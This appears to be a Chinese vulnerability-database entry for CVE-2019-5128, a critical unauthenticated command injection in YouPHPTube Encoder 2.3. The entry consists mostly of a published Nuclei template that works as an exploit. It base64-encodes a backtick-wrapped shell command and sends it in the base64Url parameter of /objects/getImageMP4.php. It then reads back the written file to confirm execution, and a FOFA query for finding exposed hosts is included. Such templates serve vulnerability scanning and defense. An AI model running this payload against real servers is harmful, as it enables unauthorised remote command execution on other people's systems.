漏洞描述
Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube.The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.
CVE-2019-5128: YouPHPTube Encoder - Arbitrary File Write
PoC代码[已公开]
id: CVE-2019-5128
info:
name: YouPHPTube Encoder - Arbitrary File Write
author: pussycat0x
severity: critical
description: |
Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube.The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.
reference:
- https://xz.aliyun.com/news/6312
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-5128
cwe-id: CWE-78
epss-score: 0.90293
epss-percentile: 0.99579
cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:*
metadata:
verified: true
vendor: youphptube
product: youphptube_encoder
fofa-query: icon_hash="-276846707"
tags: cve,cve2019,youphptube,intrusive,encoder
variables:
file_name: "{{rand_text_alpha(4)}}.txt"
content: "id"
payload: '{{base64(concat("`", content, " > ", file_name, "`"))}}'
http:
- raw:
- |
GET /objects/getImageMP4.php?base64Url={{payload}}&format=jpg HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
GET /objects/{{file_name}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
part: body_2
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
- type: status
status:
- 200
# digest: 490a0046304402201f6efb7b157d8693a23f10e905b2e53ce98d6cf57232c85b42e5af0edb3964d40220317a00664dd9d00bd9872a64d03145d9eb03ee33308345ea2864db8f5e3b8dba:922c64590222798bb761d5b6d8e72950